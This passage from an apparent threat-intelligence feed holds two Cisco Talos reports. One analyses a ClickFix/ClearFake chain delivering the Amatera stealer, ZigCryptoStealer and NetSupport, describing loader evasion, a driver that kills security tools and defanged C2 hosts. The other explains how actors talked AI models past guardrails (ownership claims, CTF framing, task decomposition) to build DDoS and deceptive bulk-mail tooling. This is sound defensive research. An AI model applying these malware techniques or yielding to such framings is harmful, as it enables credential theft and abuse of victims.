0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff and if the victim is running macOS, it uses 0x68DcE15C1002a2689E19D33A3aE509DD1fEb11A5. The response is Base64 decoded and evaluated as JavaScript.&#xA0; &#x200B;Figure 2. Modified, deobfuscated JavaScript selects an OS-specific BNB Smart Chain contract and evaluates the decoded response.The Windows browser stage creates a victim identifier, stores it in the cjs_id cookie and asks a tracking contract whether the goal for that identifier has already been reached. If the browser is not headless and the target is Windows, the script overlays a fake Google CAPTCHA-style checkbox onto the compromised page, instructing the victim to open the Windows Run dialog, paste the clipboard contents, and press Enter.&#xA0; Figure 3. Windows ClickFix verification prompt.&#x200B;&#xA0;The copied command opens a WebDAV path on a randomized subdomain of \"leaguejazire[.]com\", places the victim identifier in the path, and executes \"pf.ch\" through ordinal #1.&#xA0; &#x200B;Figure 4. Decoded Windows ClickFix command. Delayed expansion reconstructs pushd, rundll32 and popd at execution time.Censys documented the same Windows and macOS contracts in a blockchain-backed ClickFix chain, although the downstream payloads in that reporting differ from those analyzed here.&#xA0; The macOS browser stage uses the same headless-browser checks, victim tracking, and fake verification design, but its execution chain is different. It instructs the victim to open Terminal and paste a command that uses curl with a macOS user-agent string. The request goes to a subdomain of \"riyazinikokar[.]xyz\". Since the subject of our initial research was a customer running Windows, we have not further pursued the macOS side of the \"pf.ch\" branch.&#xA0;&#xA0; WebDAV launches disguised DLLs&#xA0;Both observed variants retrieve a 32-bit DLL over WebDAV using a file extension name that does not indicate it is a standard DLL file. Both use the 32-bit \"rundll32.exe\" process and invoke a function by calling the function ordinal #1. The corresponding first exports are moor in \"pf.ch\" and CfgInspectModuleData in \"verification.google\".&#xA0; Different initial loaders&#xA0;Although the WebDAV execution pattern is the same the two initial loaders use different code and protection methods.&#xA0; \"pf.ch\" uses exception-driven control flow&#xA0;The \"pf.ch\" loader is a packed 32-bit DLL whose only named export is moor with import table containing only AddVectoredExceptionHandler and __mb_cur_max functions.&#xA0;&#xA0; The packed code uses vectored exception handling, XOR loops, API hashing, and control-flow patterns, which makes the static analysis of the code more difficult. After the initialization, one of its threads is waiting for an event named hit. Once the event is triggered, it copies an embedded blob into memory and transfers control to it using Windows fibers. The next stage decoder uses XOR and LZNT1 to decode the final Amatera payload.&#xA0; The unpacked PE file, an Amatera sample, is also 32-bit, has no import table, and resolves APIs by walking loaded module export tables. The sample uses 32-to-64-bit transitions to execute system calls, possibly in an attempt to evade EDR hooks.&#xA0;&#xA0; The sample contains the build label 4.1.5-alpha and string GETWELLV2. Amatera is known to use the Steam community profiles as C2 dead drop resolvers, and the GETWELL2 string was observed in some previous samples as a name of a Steam community profile used to retrieve the IP address of the C2 server. Once C2 server address is resolved, the main configuration is downloaded.&#xA0;&#xA0; The Amatera payload was recovered only as a memory-resident artifact and was not observed to be written to disk. Its hash is nonetheless included in the indicator of compromise (IOC) list below, as memory derived hashes remain applicable to memory scanning.&#xA0; \"verification.google\" uses DLL hollowing in \"dbghelp.dll\"&#xA0;The \"verification.google\" variant does not immediately unpack its payload. It first prepares the state and then passes execution through a callback. The callback is registered using the dynamically resolved function TpAllocWork, an undocumented native NT internal function in \"ntdll.dll\". The callback is later executed asynchronously by Windows. The callback function implements most of the malicious unpacking functionality in a large control flow flattening loop.&#xA0; The loader resolves functions by hash, derives execution state from the environment and implements direct WoW64 syscall stubs. The stubs decode syscall numbers at runtime and call the WoW64 transition pointer instead of the corresponding exported \"ntdll.dll\" functions.&#xA0; &#x200B;Figure 5. Direct syscall stub used by \"verification.google\" before it maps and overwrites a clean \"dbghelp.dll\".The loader reconstructs its next stage from data in the .rdata section. It first maps a clean image of the legitimate \"dbghelp.dll\" in memory and then overwrites the beginning of its code section with the unpacked next stage. Finally, it restores executable protection before transferring control to the overwritten code section of the \"dbghelp.dll\".&#xA0;&#xA0; This module overwriting (stomping) technique is also known as DLL hollowing or module overloading. VMRay&#x2019;s technical overview of DLL hollowing describes the same core sequence: loading a legitimate DLL, overwriting its mapped code with malicious content, and executing from that overwritten region. G DATA documented module stomping in a HijackLoader chain that delivered ACRStealer, using different DLLs, \"evr.dll\", and \"rasapi32.dll\" rather than the \"dbghelp.dll\" observed in our case.&#xA0; Figure 6. The \"verification.google\" loader performs module stomping.Amatera C2 configurations&#xA0;\"pf.ch\" loaded Amatera resolves its C2 through a Telegraph page&#xA0;Before starting its Amatera C2 session, the Amatera sample used in \"pf.ch\" branch constructs the dead drop C2 URL \"https[:]//telegra[.]ph/Functions-04-03\". At the time of analysis, the page looked like a short Rust programming tutorial titled &#x201C;Functions.&#x201D; with an altered code example containing the string r.]MTQ1LjI0OS4xMDkuMTQ3)0(.&#xA0; Figure 7. \"Telegra.ph\" page used as a resolver.&#x200B;&#xA0;The raw HTML places the same value inside a println statement.&#xA0;&#xA0; &#x200B;&#xA0;Decoding MTQ1LjI0OS4xMDkuMTQ3 produces &#x201C;145.249.109[.]147&#x201D; as its C2 address.&#xA0;&#xA0; After resolving the address, the payload generates WoW64 transition gates, opens an Auxiliary Function Driver (AFD) socket and connects directly to \"145.249.109[.]147\" on TCP port 443.&#xA0;&#xA0; After connecting to the C2 server, Amatera connects to the GetEndpoints URL on the server. The response supplies randomized URI paths for different C2 functions. The stealer then uses the configuration path, together with an embedded build identifier, to retrieve its information collection rules.&#xA0;&#xA0; In the \"pf.ch\" build, a TLS-decoded HTTP buffer we were able to analyse contained a nonzero session identifier and an opaque 73-byte body whose framing is consistent with the ECDH and ChaCha20-Poly1305 protocol documented for recent Amatera versions.&#xA0;&#xA0; After removal of the transport and application encryption layers, the configuration is first Base64 decoded and then XOR decoded with the key 852149723\\x00, before parsing it as a JSON object.&#xA0;&#xA0; Apart from the rules for stealing data the received configuration also contained the instructions to load secondary payloads in a ld (load) json array.&#xA0;&#xA0; &#x200B;Figure 9. pf.ch Amatera tasking configuration showing secondary payload tasks.The ld field is an array of secondary loader tasks supplied by the Amatera controller. Within each entry, u is the download URL, tf selects the payload type and tr selects file-based (1) or fileless (2) execution. The loader supports executables, DLLs, command scripts, PowerShell, raw shellcode and MSI packages, which is described by the field tf. The p value determines task order, with lower positive values processed first.&#xA0; \"verification.google\" loaded Amatera configuration&#xA0;The \"verification.google\" Amatera build stores its bootstrap controller as an encrypted string. At runtime, it decrypts the fixed address \"45.150.34[.]2\" and connects to it directly on TCP port 443, while presenting \"github[.]com\" as the TLS server name and HTTP Host value. Unlike the \"pf.ch\" build, it does not use a public dead-drop resolver to obtain its initial C2 address. After connecting, it sends the GetEndpoints command to obtain working endpoints used for subsequent communication.&#xA0;&#xA0; As in the \"pf.ch\" Amatera payload the first accessed C2 URL is GetEndpoints. This branch&#x2019;s configuration contains over 400 entries across its browser, extension, messaging, wallet, and other-application collection lists, plus four file collection rules.&#xA0;&#xA0; The application rules in the configuration blob extend the initial browser related information collection to Telegram, Signal, WhatsApp, and other messaging data. They also cover over 100 desktop wallet locations and credential data from password managers, authenticators, FTP clients, mail clients, VPN software, and remote-access tools. Representative targets include KeePass, Bitwarden, 1Password, RoboForm, NordPass, WinAuth, Authy, FileZilla, AnyDesk, NordVPN and AzireVPN.&#xA0; Four file grabber rules cover the Desktop, Downloads, Documents and Windows Recent-items directory. Across those rules, more than 100 unique filename and extension patterns look for private keys, wallet backups, API and OAuth material, two-factor authentication data, password databases and certificate files such as .kdbx, .p12, .pfx and .pem. Most of the collection rules are focused on stealing cryptocurrency related data and credentials.&#xA0;&#xA0; Amatera secondary payloads&#xA0;Further on, we focus on the secondary loader tasks, which may point to a more advanced threat actor, based on the installed secondary payload type.&#xA0; The \"pf.ch\" Amatera build received two secondary tasks. One deployed a NativeAOT loader and ZigCryptoStealer, while the other ran a Go reverse TCP proxy from memory. The \"verification.google\" build received a PowerShell task that installed NetSupport Manager.&#xA0;&#xA0; Amatera branch Task type Follow-on capability pf.ch File-based archive Chrome DLL side-loading host, NativeAOT loader, process termination and ZigCryptoStealer pf.ch Fileless shellcode Go reverse TCP proxy over WebSocket and Yamux verification.google Fileless PowerShell Unauthorized NetSupport Manager remote access NativeAOT chain runs ZigCryptoStealer&#xA0;The \"jquery.min.js\" entry has priority 1, so Amatera processes it first. Its tf: 1 and tr: 1 values select the file-based executable handler. The server response does not have to be a PE file but it can also be an archive file. When this handler receives an archive, the loader extracts it to a temporary directory, enumerates the resulting *.exe file and launches the selected executable. The most recently observed response was a ZIP archive, SHA-256 279d04c0cfd700c8bcb9acbed528131d3ffef8e25d12713e8649772739aecb92.&#xA0;&#xA0; The archive included the file \"platform_experience_helper.exe\", a legitimate Google Chrome component. The executable imports GetUserNameExW from \"Secur32.dll\", which is a malicious DLL file in the archive which gets sideloaded by the Chrome component.&#xA0;&#xA0; The side-loaded \"Secur32.dll\" is a NET NativeAOT loader which decrypts and loads 2 PE files. The first file is a user mode payload and the second a vulnerable driver used to ter. The NativeAOT DLL starts &#x201C;C:\\Windows\\\"explorer.exe\" in a suspended state, manually maps the PE&#x2019;s headers and sections into the child, changes its initial thread context to the new entry point, and resumes it.&#xA0;&#xA0; The payload is a cryptocurrency stealer written in Zig language &#x2014; ZigCryptoStealer. It polls the clipboard, recognizes several cryptocurrency address formats and can replace matching values with addresses embedded in the payload.&#xA0;&#xA0; The payload makes a separate JSON-RPC eth_call through \"bsc[.]rpc[.]blxrbdn[.]com\" to BNB Smart Chain contract 0x7CC3cFC1Ac007B8c6566fD2C7419b15a75473468. This is a second use of EtherHiding in the infection chain, this time by the final payload rather than the browser delivery framework. VMRay has previously documented ZigCryptoStealer variants using BNB Smart Chain contracts as a dead drop for C2 configuration.&#xA0;&#xA0; ZigCryptoStealer disguises the request as a routine query for an ERC-20 token balance. It supplies a randomly generated cryptocurrency address, but the smart contract ignores it and instead returns text stored by the operator. The operator can change this text using the contract&apos;s setData(string) function. During our analysis, the contract returned \"lb[.]propertyfind[.]cc\", which ZigCryptoStealer then used as its C2 domain.&#xA0; The contract was deployed on March 16, 2026. The same wallet that deployed it made 39 successful setData calls through July 26. These calls provide a public history of the C2 values supplied to the malware with six domains active during July:&#xA0; Effective period in UTC Contract value June 30 &#x2013; July 5 fd[.]gstats-api-contact[.]cc July 5 &#x2013; 9 pkg[.]vogueatelier[.]cc July 9 &#x2013; 12 kffd3[.]vogueatelier[.]cc July 12 &#x2013; 18 kffd3[.]vexlatech[.]cc July 18 &#x2013; 26 static[.]quorashift[.]cc July 26 &#x2013; 30 lb[.]propertyfind[.]cc Talos used Cisco Umbrella to observe DNS activity for all six domains while they were active. The two most recent values also had the broadest query distribution. Umbrella data includes DNS quaries from 38 countries for \"static[.]quorashift[.]cc\" and 98 for \"lb[.]propertyfind[.]cc\". Queries for the current value came most often from the United States, Indonesia, Brazil, India, and Egypt.&#xA0;&#xA0; &#x200B;Figure 10. Cisco Umbrella distribution of DNS requests for \"lb[.]propertyfind[.]cc\" from the time it became the current contract value on July 26 through July 30. The map shows the reported share of DNS query origins.&#xA0;Passive DNS shows that all six domains resolved through shared Cloudflare addresses.&#xA0;&#xA0; The second decrypted PE is a signed Windows driver whose version information contains the names MOCOMSYS & DCRC and DCRCV_U Driver (for SCM). Its original filename is \"DCRCVDrv.sys\", and it exposes the device \\Device\\DCRCVDRV_U.&#xA0;&#xA0; The NativeAOT loader enumerates running processes, hashes their names, and compares the hashes with an internal target list of EDR software and other security tools. For every matched process name, it sends the process identifier to the driver with IOCTL 0x2205c0. The driver&#x2019;s handler accepts the four-byte PID, obtains a process handle and calls ZwTerminateProcess. We found no caller authorization check in that IOCTL branch. This gives the loader a kernel-mode process-termination primitive, a BYOVD driver.&#xA0; Figure 11. Modified decompilation from the malicious \"Secur32.dll\" user-mode loader. It enumerates processes, compares hashes of their names with its target list, and sends the PID of each match to the separate driver through IOCTL 0x2205c0.&#xA0;&#x200B; &#x200B;Figure 12. Modified decompilation from the separate signed \"DCRCVDrv.sys\" kernel driver. Its IOCTL handler reads the PID supplied by \"Secur32.dll\", obtains a process handle and calls ZwTerminateProcess. Types and names were replaced for readability. Go payload turns the host into a reverse TCP proxy&#xA0; The URL for the second secondary payload of the \"pf.ch\" branch yielded a binary shellcode blob with SHA-256 643ef35536ff9273fb84b8504467b1a5645cd3ffd5476d64b99244b02131b205.&#xA0; The 32-bit shellcode walks the process environment block (PEB) to find \"ntdll.dll\" and resolves LdrLoadDll, NtAllocateVirtualMemory, NtProtectVirtualMemory and NtFreeVirtualMemory . It then decrypts and decompresses the final payload stored in the shellcode using XOR to decrypt and LZNT1 to decompress the compressed proxy payload.&#xA0; The unpacked file has SHA-256 1819827e17f31e72d456158b6b9c90af25a65945f6f05d04a060da9f24179b25.&#xA0; The payload is a Golang 32-bit Windows executable with main package &#x201C;github.com/acr/proxy-panel/cmd/bot&#x201D;. It includes HashiCorp Yamux network multiplexing library with C2 hardcoded &#x201C;wss://\"update[.]dubbedmuch[.]cc\"/&#x201D;.&#xA0; The proxy reads the Windows MachineGuid and hostname, then sends them over WebSocket Secure (wss) protocol. After the C2 server accepts the client, the program creates a Yamux server session, multiplexing outgoing communications over the same connection. Each logical stream supplies a source and destination address. The client connects to the requested destination and relays bytes in both directions.&#xA0; Figure 13. \"pf.ch\" Amatera runtime and tasking.&#x200B;&#xA0;PowerShell in the \"verification.google\" branch installs NetSupport Manager&#xA0; The secondary payload in this branch is \"https://kr[.]cedar2glanz[.]ru/jewel[.]js\". The tf value 4 of the single secondary payload loader instruction (ld) identifies the payload as PowerShell. The tr value 2 selects the execution path that retrieves the URL with PowerShell DownloadString and runs it through Invoke-Expression (IEX). Proofpoint&#x2019;s Amatera analysis documents the same ld, tf and tr semantics in more details.&#xA0;&#xA0; &#x200B;Figure 14. Reconstructed first PowerShell decoding layer.The next PowerShell stage dynamically resolves native functions and runs an environment check before installing the payload containing the following steps:&#xA0; It queries the C: volume serial and compares it with the hard-coded value 4E014A2F. The original expression returns true when this value matches, allowing execution to continue early and skipping the remaining checks.&#xA0;&#xA0;It calculates system uptime from Win32_OperatingSystem.LastBootUpTime. An uptime below 10 minutes returns false, causing the script to exit.&#xA0;It measures a native 500 ms NtDelayExecution call with GetTickCount64. If fewer than 400 ms appear to elapse, the gate returns false, which can identify an environment that accelerates or skips delays.&#xA0;It checks the processor count. Fewer than three processors unexpectedly returns true and allows execution to continue early rather than rejecting the low-resource system.&#xA0;It queries total physical memory. A reported value below 3.2GiB returns false.&#xA0;It queries Win32_VideoController and selects the largest reported AdapterRAM value. A reported maximum below 384 MiB returns false.&#xA0;It checks display-device friendly names and manufacturers against 36 strings associated with virtual graphics, remote displays, cloud platforms and generic virtual adapters. A match returns false.&#xA0;After the environment checks, the script derives an installation path by hashing MachineGuid|zdozwoqx3c. It also starts two background Powershell runspaces that request many legitimate URLs, including GitHub API, npm, Docker Hub, PyPI, NuGet, and PowerShell Gallery. The requests seem to generate decoy traffic to hide the malicious download within plausible developer activity.&#xA0; The script downloads \"https://phys[.]stunned-amniotic[.]com/hub[.]log\". Although the logs at the targeted system in Ukraine contained no evidence of accessing this URL we were able to download the file that was likely intended to be downloaded and executed by the Amatera stealer payload.&#xA0;&#xA0; The response at the time of analysis was a ZIP file with SHA256 bd36f4c15fe0acb6748da5ed12e45dcc37d412385812c078d1e4f04730e9f69b. Finally, the PowerShell validates ZIP entry paths, extracts the archive in the %APPDATA% directory, and starts \"hypersnap.exe\" executable without a visible window and creates a scheduled task triggered at user logon.&#xA0; The ZIP contains legitimate NetSupport Manager software&#xA0;The launched \"hypersnap.exe\" is a renamed, signed NetSupport Manager 12.44 \"client32.exe\". The \"client32.exe\" stub calls the export _NSMClient32@8 in signed \"PCICL32.DLL\", the main NetSupport client runtime containing the main functionality of the remote access platform.&#xA0;&#xA0; The actor-controlled \"client32.ini\" NetSupport Manager configuration enables silent operation, hides the system-tray interface, disables visible chat, message, disconnect, replay and help controls and configures \"paternal-angrily[.]com:443\" as the NetSupport HTTP Gateway.&#xA0; The client connects to the gateway, which acts as a proxy between the threat actor and the NetSupport Manager client installation at the victim system. The NetSupport client was configured to poll the gateway every 60 seconds. At the time of the analysis the domain resolved to the IP address \"212.118.56[.]166\", based in Russia.&#xA0;&#xA0; The NetSupport deployment used a license issued as KAKAN, with serial number NSM789508. The exact license file has appeared in numerous malicious NetSupport packages, including activity publicly tracked as EVALUSION and IClickFix. We therefore treat it as an indicator of shared deployment lineage rather than a unique threat actor identifier.&#xA0; NetSupport adds an operator driven capability after Amatera&#x2019;s automated collection. Amatera steals configured credentials, session data, cryptocurrency material, and selected files. An unauthorized NetSupport client can then provide screen and input control, file transfer, inventory, process and service management and remote command or PowerShell execution. This could let an operator inspect data outside Amatera&#x2019;s predefined rules, act on sessions from the original endpoint, or deploy additional tooling.&#xA0;&#xA0; Indicators of compromise (IOCs)&#xA0;The IOCs for this threat are also available at our GitHub repository here.&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","cisco-talos-antivirus","cisco-talos-malware-protection","cisco-talos-network-intrusion-prevention","threats","threat-spotlight","geo:inferred"],"relatedCves":[],"titleFingerprint":"amatera-chain-clearfake-delivers-infection-manager-netsupport-stealer-webdav-zigcryptostealer","countryCodes":["BR","EG","ID","IN","RU","UA","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/clearfake-webdav-infection-chain/","type":"report","title":"Cisco Talos: ClearFake WebDAV infection chain delivers Amatera stealer, ZigCryptoStealer, and NetSupport Manager"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-08T10:01:07.000Z","addedAt":"2026-09-08T10:52:52.070Z","updatedAt":"2026-09-08T10:52:52.070Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"a790b35d-ed81-467c-bf33-4fb5515736db","slug":"talos-keep-going-bro-you-ve-got-this-a-data-driven-look-at-how-dde3a335","externalId":"6a689bca559a880001aed202","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"“Keep going, bro. You’ve got this!” A data-driven look at how adversaries are weaponizing AI","description":"Actor usage of AI is exploding. By analyzing artifacts left behind, Talos has created a detailed analysis of how we are seeing adversaries leverage the technology to include development, force multiplication, and vulnerability research.Based on the evidence Talos gathered, guardrails did not provide much protection, with most actors able to convince the models to comply despite the lack of sophisticated techniques or encoding.&#xA0;The pre-existing skill of the actor has a large impact on what they can accomplish with AI. Talos observed novice users able to create malicious capabilities, albeit with limited capabilities and success. Advanced users were able to build astonishing capabilities, pushing the models to create sophisticated and complex outputs.Artificial intelligence (AI) and associated language models are now ubiquitous and heavily used in both personal and professional contexts to streamline tasks and expand capabilities. With AI being used everywhere and by almost everyone, one of the biggest questions is how malicious actors are taking advantage. Fortunately, actors make mistakes and chatbots leave artifacts. Leveraging cloud-based AI models leaves behind a variety of artifacts, most notably a prompt log. These logs can take on a variety of shapes and sizes, but they are left on endpoints that are running various applications, such as Claude Code, CodeX, Cursor, or Gemini. Over the course of our research, we&#x2019;ve collected a significant corpus of these files and can start discussing the ways we see bad actors leveraging these technologies. In conducting the research, three categories of activity emerged. One was using AI as a malicious software engineer, leveraging AI to write (in some cases) very sophisticated code with clear malicious intentions. Another was actors leveraging AI to scale criminal operations and campaigns. Finally, there were a lot of actors leveraging it for bug bounty or vulnerability research, rapidly accelerating their capabilities of discovery and disclosure. Each category&#xA0;demonstrates how threat actors are currently leveraging AI. Within each category is a wide disparity in sophistication based on the knowledge level of the actors involved. We tried to include use cases to cover the breadth of what we found. Takeaways and high-level findings&#xA0;With the recent disclosures from Hugging Face and OpenAI, it&apos;s clear the era of agentic attackers has effectively arrived. In that incident, the models were operating inside a sanctioned evaluation with safeguards deliberately relaxed &#x2014; but they autonomously escaped their sandbox, found and chained real vulnerabilities, and compromised production infrastructure to reach their objective. The capabilities exist; the only missing ingredient is malicious intent, and it&apos;s a matter of time before threat actors supply it. For defenders, this is a wake-up call: Vulnerabilities will surface faster, exploitation will happen sooner, and the actors behind it won&apos;t need rest or downtime. As the case studies below show, the central challenge for guardrails right now is supporting legitimate dual-use work &#x2014; red teaming and vulnerability research &#x2014; without empowering malicious actors. One of the immediate takeaways is that guardrails are not functioning as expected. We did not encounter any sophisticated encoding or techniques designed to trick the models &#x2014; most of the time it was a simple &#x201C;I&apos;m allowed to do this,&#x201D; and the model complied. When guardrails did engage, they accomplished little. In one instance, we watched an actor abandon a censored model and pivot to an uncensored version, which completed the task without question. In another, a model pushed back on a distributed denial-of-service (DDoS) operator, but by that point the tooling had already been built. This wasn&apos;t specific to a single model or platform; it was across the board.&#xA0; The other big takeaway is that an actor&apos;s skill level largely determines how effectively AI can be leveraged and how much impact it ultimately has. Unsophisticated actors can use AI to cobble together malicious projects that technically work, but lacking the expertise to push the tools further, they end up with substandard results &#x2014; limited functionality and little ability to update or improve what they&apos;ve built. By contrast, sophisticated actors have pushed the bounds of what we thought possible: building highly effective platforms for compromise or assembling pipelines of zero-days to disclose or sell depending on their intentions. In their hands, AI is a true force multiplier. From an enterprise perspective, organizations need to understand that threat actors are heavily leveraging AI capabilities in their pipelines, and defenders need to do the same. The organizations best equipped to handle the coming deluge of additional vulnerabilities, alerts, and incidents will be the ones that prepare now. Agents are going to become a bigger part of the SOC as these volumes rise, and identifying actionable alerts will be paramount. Organizations that aren&apos;t already exploring agentic capabilities to let human analysts focus on the most important alerts will soon find themselves chasing that capability. How actors evaded guardrails&#xA0;As mentioned previously, Talos did not encounter any sophisticated encoding or other extensive evasion techniques. Instead, the actors seemed to rely on a couple of tried and tested methods with considerable success. One of the most common was ownership claims. Simply claiming to own the equipment or infrastructure without any additional verification was enough in many circumstances. We also found a lot of successful instances of actors using the Capture the Flag (CTF) or bug bounty labeling. This unlocked models to a variety of tasks, including vulnerability hunting and subsequent exploitation, without requiring any significant follow-up or additional vetting. Additionally, we saw actors leveraging task decomposition &#x2014; splitting risky actions across multiple sessions and files &#x2014; as an effective avenue to bypass guardrails. Building the components slowly and working through malicious components in a deliberate manner, breaking them apart sufficiently to evade the models&#x2019; protections. We saw some successful blanket authorization and persona conditioning attempts, where actors would attempt to pre-approve or pre-allow the actions via a variety of means, including memories and various other markdown files. The most interesting was the semantic evasion techniques we saw from the Hephaestus activity. In that case, actors built their platform to avoid refusals altogether by using neutral verbs instead of overtly malicious ones. As a result, they were able to have considerable success with agents conducting innocuous requests without realizing the full operational context. Use cases: AI as a malicious software engineer&#xA0;DDoS operator powered by AI&#xA0;One of the more interesting examples we discovered focuses on an actor creating distributed denial-of-service (DDoS) tooling. Initially the actor purported to be stress testing DDoS protection capabilities they had developed for their home networks. After some back and forth to confirm the targeting, the model complied and started developing the capabilities. Based on the prompts we reviewed, the actor does not seem to have a deep understanding of programming but does have clear intent on what they want to develop. This is how the conversation begins: After some back and forth, it became very clear that the actor was using the bot to do full development with little understanding of how it was functioning, as evidenced by some of the questions they presented. It also became very clear that this was not a legitimate application. Most stress testers don&#x2019;t label them as attacks. The bot eventually complies and provides the needed tooling to conduct the stress tests, which is where things start to get a little interesting. Once the tooling has been completed, the actor starts complaining about bots not connecting properly and the bin being too large for the server. Shortly after, the real targeting became clear. This was the first reference to Android TVs, and it will not be the last. The actor then went through a series of iterations of the tooling, with very basic instructions like &#x201C;remove the auth part, I don&#x2019;t want the auth stuff.&#x201D; It&#x2019;s at this point that the model starts to push back on the functionality and capability, as evidenced by a series of prompts we were able to observe. This was likely driven by the amount of bots that were starting to connect to the platform they created. It was at this point we got our first indication of the amount of bots they were controlling. The model begins even to push back even stronger as the conversation continues. This goes on for quite some time: the actor repeatedly trying to get the model to work with the model consistently pushing back. We were not able to recover the text files in question, so their contents remain a mystery. The actor repeatedly reinforces that the devices in question are their virtual machines (VMs) and not to worry about the address space because &#x201C;it&#x2019;s just to simulate real traffic.&#x201D; To the model&#x2019;s credit, it does keep pushing back; unfortunately, this occurs after it has already delivered the basic functionality requested by the actor.&#xA0; This use case demonstrates how actors with little technical understanding can still leverage large language models (LLMs) and associated models to create malicious tooling. The downside for the actor is that troubleshooting requires constant effort to convince the LLM to continue working on the project. The actor seemed to already control nearly 2,000 Android TVs. With this capability, they could potentially start to monetize it with DDoS attacks, assuming they can get the model to comply.&#xA0; This particular actor was clearly unsophisticated, but other actors we found were quite the opposite. AI becomes the engineer behind a bulk-mail validation operation&#xA0;One of the examples contained five interactive sessions documenting the development and operation of a large bulk-mail platform. The actor described the project as list &#x201C;scrubbing,&#x201D; but the method did not rely on conventional validation services. Instead, the system sent real messages to old or potentially third-party addresses and treated successful delivery as evidence that a mailbox remained active. The actor&#x2019;s objective was explicit: They described the broader design in another prompt: Delivery and bounce events were written to a contact database, permanent failures were suppressed and accepted addresses became more valuable records for later campaigns. At the same time, the traffic exercised the actor&#x2019;s sending infrastructure and measured how much volume each email provider would accept. Each address was tested with a single innocuous-looking message &#x2014; a privacy-policy update: Figure 1. \"Privacy Policy Update\" email with transparent tracking pixel.The injector assigned five subject variants in a fixed round-robin rotation: &#x201C;Privacy Policy Update&#x201D; &#x201C;{name}, your Tubely account is being updated&#x201D; &#x201C;&#x1F512; Important update for your Tubely account&#x201D; &#x201C;hey, quick update about your account&#x201D; &#x201C;Action required: Tubely terms update by June 30&#x201D; For each recipient, the injector incremented a variant counter and selected the remainder after division by five, producing an even repeating sequence rather than choosing subjects randomly. The second variant substituted the recipient&#x2019;s first name, while the casual fourth variant used &#x201C;The Tubely Team&#x201D; as the displayed sender instead of &#x201C;Tubely.&#x201D; Figure 2. Observed AI-assisted bulk-mail validation workflow.AI recorded the selected variant with the injection and subsequent delivery events, allowing the dashboard and hourly reports to compare sent, delivered, and opened totals for each subject. AI also added a unique one-pixel image to every message and linked it to the recipient&#x2019;s database record. This allowed the actor to measure opens and collect timing, IP address, and user-agent data in addition to determining whether the mailbox accepted the message. The recovered project supported tens of millions of records divided into audience categories: The legality discussion offers useful insight into the actor&apos;s awareness of the campaign&apos;s exposure and their attempts to justify it. They opened by asking AI: The AI&apos;s initial response drew the relevant distinction clearly. It separated legitimate cleaning of a company&apos;s own opt-in list from mailing unrelated datasets, and it identified the specific problems in this case: that BigBasket users had not opted into Tubely, and that an \"account update\" subject line implied a relationship that might not exist &#x2014; characterizing the activity as \"cold outreach dressed as transactional mail\" and \"phishing-adjacent.\" The actor challenged this on legal grounds: AI conceded the general point but held its core objection, noting that CAN-SPAM still prohibits deceptive headers and that the \"account update\" framing to non-account-holders remained the operation&apos;s real exposure. The actor then asserted: By presenting the addresses as a recovered first-party audience, a single unverified claim, the AI reversed its assessment entirely, concluding the recipients \"are Tubely users,\" that the subject lines were therefore \"completely accurate,\" and that \"the ethical question evaporates.\" It went beyond accepting the actor&apos;s framing and supplied its own rationalization: The AI suggested that the dataset names it had just been reasoning about &#x2014; bigbasket, brizy, flappy_bird &#x2014; were, in its words, \"just whatever the internal team named the data export batches, not the actual source of the users.\" This was an explanation the actor had not offered, and one contradicted by the datasets themselves, which the actor elsewhere described as distinct third-party audiences (a 20-million-record BigBasket set of \"shoppers,\" a gaming set, and others). &#xA0; &#xA0; The &#x201C;tubely[.]com&#x201D; domain is not new, and neither is the behavior. Public forums, and personal blogs document Tubely from October 2009 through March 2011 as a \"viral\" social site whose registration flow requested the user&apos;s email account credentials and then enrolled their address book, generating friend-appearing invitations to recipients who had never signed up. Multiple independent accounts describe receiving invitations purportedly from real contacts, and describe account cancellation as substantially harder to complete than registration. Contemporary write-ups tie the site to Astute Software &#x2014; the same registrant named in the domain&apos;s WHOIS records, and the same identity behind the 2026 operation. The operation examined here is therefore not a first-party re-engagement of a dormant userbase. It is a domain with a documented history of non-consensual contact harvesting, reactivated by the same operator, which directly undercuts the \"i had about 50MM people in tubely\" provenance claim the AI model accepted without scrutiny. AI was not used only to suggest subject lines or provide isolated code fragments. It functioned as the project&apos;s principal developer and live systems engineer. The actor frequently supplied only a desired outcome &#x2014; sometimes as briefly as \"u do it\" or \"u need to do it all\" &#x2014; and expected the AI to inspect the server, choose an implementation, apply the changes and verify the result. When something broke, the instruction was often just \"figure out what is exactly wrong.\" The resulting platform combines PowerMTA with Node.js services, PostgreSQL/TimescaleDB, Docker, process supervision, and web dashboards. The sessions record persistent failures across that stack. DKIM signing was broken for the entire captured period &#x2014; Google Postmaster showed a 0.0% DKIM pass rate day after day, and Gmail eventually began rate-limiting the mail outright (\"Your email has been rate limited because DKIM authentication didn&apos;t pass for this message\"). Bounce statistics were repeatedly implausible or contradictory, which the actor noticed himself: and elsewhere, on a report showing 2,050 sent and 2,050 delivered, The injector consistently queued far more mail than the platform could deliver and the dashboards themselves failed in ways ranging from endless loading to a memory leak that crashed the page. The actor routinely caught this implausible output and pushed the AI to diagnose its own earlier work &#x2014; at one point asking it to reconstruct \"the chronology... who changed what and when?\" AI reduced the engineering skill required to assemble and operate the platform, but it did not eliminate technical debt or operational mistakes; a substantial share of the sessions is AI troubleshooting problems its own prior changes had introduced. The actor eventually connected the validated audiences to the launch of a mobile game that seems to be still in development. They described the email platform&#x2019;s role as making the product famous and told AI, &#x201C;ur job is to reipen the people via email .. red hot to engage.&#x201D; AI documented a four-message campaign that would segment recipients by presumed interests, measure engagement and build curiosity before revealing the game on launch day. The proposed opening message used a Tamil Nadu political rivalry as its emotional hook: &#x201C;Something is coming. Tamil Nadu has always been divided &#x2014; TVK or DMK. Vijay or Stalin. Two visions, two loyalties, millions of people. In 7 days, that battle gets a scoreboard. Whose side are you on?&#x201D; Later drafts escalated the pressure with subject lines such as &#x201C;Your team is losing right now&#x201D; and unsupported claims that one political side had overtaken the other and that 12,000 people were already participating. The final message revealed the Any Bird game and directed recipients to play. AI&#x2019;s own campaign notes described the strategy as building FOMO (fear of missing out), using social proof, and applying 